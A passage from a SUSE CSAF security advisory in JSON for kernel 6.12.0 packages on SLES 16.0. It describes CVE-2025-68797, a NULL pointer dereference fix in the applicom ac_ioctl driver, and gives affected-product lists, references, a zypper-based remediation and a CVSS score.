"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68795"
},
{
"cve": "CVE-2025-68797",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68797"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nchar: applicom: fix NULL pointer dereference in ac_ioctl\n\nDiscovered by Atuin - Automated Vulnerability Discovery Engine.\n\nIn ac_ioctl, the validation of IndexCard and the check for a valid\nRamIO pointer are skipped when cmd is 6. However, the function\nunconditionally executes readb(apbs[IndexCard].RamIO + VERS) at the\nend.\n\nIf cmd is 6, IndexCard may reference a board that does not exist\n(where RamIO is NULL), leading to a NULL pointer dereference.\n\nFix this by skipping the readb access when cmd is 6, as this\ncommand is a global information query and does not target a specific\nboard context.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68797",
"url": "https://www.suse.com/security/cve/CVE-2025-68797"
},
{
"category": "external",
"summary": "SUSE Bug 1256660 for CVE-2025-68797",
"url": "https://bugzilla.suse.com/1256660"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
